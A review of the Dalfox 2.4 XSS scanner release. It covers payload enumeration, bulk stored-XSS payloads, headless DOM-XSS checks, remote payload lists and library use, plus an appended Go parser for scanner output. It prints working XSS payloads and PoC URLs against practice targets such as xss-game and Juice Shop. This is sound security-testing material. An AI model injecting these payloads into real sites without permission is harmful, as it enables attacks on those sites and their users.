Dalfox 2.4 release! review with me!

Dalfox 2.4 features

Summary

  • Added payload mode
  • Added using remote assets
  • Added headless browser (only for domxss and inJS)
  • Support to scanning URL Fragments(hash)
  • Support library package (golang)
  • Update bav (added crlf detection)
  • Fixed many bugs!

Added mode

  • payload mode

Added flags

  • --deep-domxss
  • --skip-headless
  • --remote-wordlists
  • --remote-payloads

Payload mode

flags!

Usage:
  dalfox payload [flags]
Flags:
      --encoder-url            Encoding output [URL]
      --entity-event-handler   Enumerate a event handlers for xss
      --entity-gf              Enumerate a gf-patterns xss params
      --entity-special-chars   Enumerate a special chars for xss
      --entity-useful-tags     Enumerate a useful tags for xss
      --enum-attr              Enumerate a in-attr xss payloads
      --enum-common            Enumerate a common xss payloads
      --enum-html              Enumerate a in-html xss payloads
      --enum-injs              Enumerate a in-js xss payloads
  -h, --help                   help for payload
      --make-bulk              Make bulk payloads for stored xss
      --remote-payloadbox      Enumerate a payloadbox's xss payloads
      --remote-portswigger     Enumerate a portswigger xss cheatsheet payloads

make-bulk

make-bulk can create customized bulk payloads based on dalfox's payload generation logic, or payloads following a pattern such as a sequence in which the alert value increases sequentially. Based on this, it can be used for bulk tests, e.g. Stored XSS testing where a large amount of XSS code is inserted at once.

dalfox payload --make-bulk
....
<input onbeforecopy=alert(72) value=\"XSS\" autofocus>
<textarea onbeforecopy=alert(73) autofocus>XSS<\/textarea>
<a onbeforecopy=\"alert(74)\" contenteditable>test<\/a>
<abbr onbeforecopy=\"alert(75)\" contenteditable>test<\/abbr>
<acronym onbeforecopy=\"alert(76)\" contenteditable>test<\/acronym>
// bulk increments the popup value (alert, etc.) sequentially, so it can be used to identify which injection fired during stored XSS tests
... snip ....

Enum payload and Entity

You can extract the payload patterns, or entities, that dalfox uses. They can be reused as wordlists in a fuzzer, etc.

dalfox payload --entity-event-handler
[I] [Entity-Event-Handlers][Line: 147]
onabort
onactivate
onafterprint
onafterscriptexecute
onafterupdate
onanimationcancel
onanimationstart
onauxclick
... snip ...

Now, use headless browser in dalfox

From now on, dalfox partially uses a headless browser. Of course, it is kept to a minimal configuration so that it does not affect speed, and it is used to verify some inJS cases (DOM XSS and XSS inside JavaScript) to increase accuracy and detection rate. 😎

A flag called ‘--deep-domxss’ is supported for more in-depth DOM XSS testing. This flag runs headless-based testing with more DOM XSS payloads than before. Of course, it slows things down a little.. 😭

Using remote assets

Now, Dalfox can test with remote resources.

XSS Payload from online

dalfox url https://xss-game.appspot.com/level1/frame --remote-payloads=portswigger
[*] 🦊 Start scan [SID:Single] / URL: https://xss-game.appspot.com/level1/frame
[I] Found 2 testing point in DOM base parameter mining
[I] Found 1 testing point in Dictionary base paramter mining
...snip...
[I] A 'portswigger' payloads has been loaded [1488L / 93K]

Parameter mining from online

dalfox url https://xss-game.appspot.com/level1/frame --remote-wordlists=assetnote
[*] 🦊 Start scan [SID:Single] / URL: https://xss-game.appspot.com/level1/frame
[I] A 'assetnote' wordlist has been loaded [29993L / 275K]
[I] Found 2 testing point in DOM base parameter mining

In the Code

An interface is now implemented and provided so that dalfox can easily be used as a library in Golang code.

Get the dalfox library

▶ go get github.com/hahwul/dalfox/v2/lib

Using dalfox in your Golang code

package main

import (
	"fmt"

	dalfox "github.com/hahwul/dalfox/v2/lib"
)

func main() {
	// Scan options; here only a cookie is attached to every request.
	opt := dalfox.Options{
		Cookie: "ABCD=1234",
	}
	// Run a single-URL scan with the given target and options.
	result, err := dalfox.NewScan(dalfox.Target{
		URL:     "https://xss-game.appspot.com/level1/frame",
		Method:  "GET",
		Options: opt,
	})
	if err != nil {
		fmt.Println(err)
	} else {
		fmt.Println(result)
	}
}

For details, see https://pkg.go.dev/github.com/hahwul/dalfox/v2/lib.

More

BAV - CRLF

[*] 🦊 Start scan [SID:Single] / URL: http://localhost:8070/xss/abcd/2
[G] Found CRLF Injection via built-in grepping / original request
[POC][G][CRLF/GET] http://localhost:8070/xss/abcd/2
[I] Found 0 testing point in DOM base parameter mining
[I] Content-Type is text/html; charset=UTF-8is 🔍
[I] Reflected PATH '/xss/dalfoxpathtest/2' => Injected: /inJS-single(1)]
[V] Triggered XSS Payload (found dialog in headless)aiting headless
[POC][V][GET] http://localhost:8070/xss/abcd'-confirm(1)-'/2?=

https://github.com/hahwul/dalfox/issues/227

Scanning URL Fragments

dalfox url https://juice-shop.herokuapp.com/\#/search\?q\=aaa
......
[*] 🦊 Start scan [SID:Single] / URL: https://juice-shop.herokuapp.com/#/search?q=aaa
[I] Found 0 testing point in DOM base parameter mining
[I] Content-Type is text/html; charset=UTF-8is 🔍
[I] X-Frame-Options is SAMEORIGIN
[I] Access-Control-Allow-Origin is *
[V] Triggered XSS Payload (found dialog in headless)aram and waiting dom xss
[POC][V][GET] https://juice-shop.herokuapp.com/#/search?q=%3Csvg/OnLoad=%22%60$%7Bprompt%601%60%7D%60%22%3E

https://github.com/hahwul/dalfox/issues/240
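As an added example that is not part of the release notes or of the dalfox code base, here is a small Go program tying the library section ("In the Code") to the output shown under "BAV - CRLF" and "Scanning URL Fragments": it parses the [POC] lines dalfox prints into structured findings and flags those whose PoC sits only in the URL fragment. The Finding type and the ParseFindings and ServerVisible functions are this example's own names (not a dalfox API), and the sample output is constructed from the log lines quoted on this page.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one "[POC]" line of dalfox output, split into its parts.
// The struct and its field names are this example's own, not a dalfox type.
type Finding struct {
	Kind       string // "V" = verified in the headless browser, "G" = found by built-in grepping
	Vector     string // e.g. "GET" or "CRLF/GET"
	URL        string
	InFragment bool // the PoC is carried in the URL fragment ("#...")
}

// pocLine matches the "[POC][<kind>][<vector>] <url>" layout shown in the release notes.
var pocLine = regexp.MustCompile(`^\[POC\]\[([A-Z])\]\[([^\]]+)\] (\S+)$`)

// ParseFindings keeps only the [POC] lines of raw scanner output and parses them.
func ParseFindings(output string) []Finding {
	var findings []Finding
	for _, line := range strings.Split(output, "\n") {
		m := pocLine.FindStringSubmatch(strings.TrimSpace(line))
		if m == nil {
			continue // progress and info lines ([*], [I], [V], [G] ...) are skipped
		}
		f := Finding{Kind: m[1], Vector: m[2], URL: m[3]}
		if u, err := url.Parse(f.URL); err == nil && u.Fragment != "" {
			f.InFragment = true
		}
		findings = append(findings, f)
	}
	return findings
}

// ServerVisible reports whether the payload reaches the server at all. A PoC
// that lives only in the fragment is evaluated by the browser and never appears
// in access logs or WAF telemetry, so log-based detection cannot see it and
// client-side evidence (or a headless check, as dalfox does) is needed instead.
func (f Finding) ServerVisible() bool {
	return !f.InFragment
}

// sampleOutput is constructed from the log lines quoted in the release notes.
const sampleOutput = `[*] 🦊 Start scan [SID:Single] / URL: http://localhost:8070/xss/abcd/2
[G] Found CRLF Injection via built-in grepping / original request
[POC][G][CRLF/GET] http://localhost:8070/xss/abcd/2
[I] Found 0 testing point in DOM base parameter mining
[V] Triggered XSS Payload (found dialog in headless)
[POC][V][GET] http://localhost:8070/xss/abcd'-confirm(1)-'/2?=
[*] 🦊 Start scan [SID:Single] / URL: https://juice-shop.herokuapp.com/#/search?q=aaa
[POC][V][GET] https://juice-shop.herokuapp.com/#/search?q=%3Csvg/OnLoad=%22%60$%7Bprompt%601%60%7D%60%22%3E`

func main() {
	for _, f := range ParseFindings(sampleOutput) {
		fmt.Printf("kind=%s vector=%-8s server-visible=%-5t %s\n",
			f.Kind, f.Vector, f.ServerVisible(), f.URL)
	}
}
```

Run it with `go run .`; the juice-shop finding comes out as not server-visible, which is exactly why fragment scanning needs the headless browser and why a fix for such a finding has to be verified in the page's own JavaScript rather than in server-side filtering.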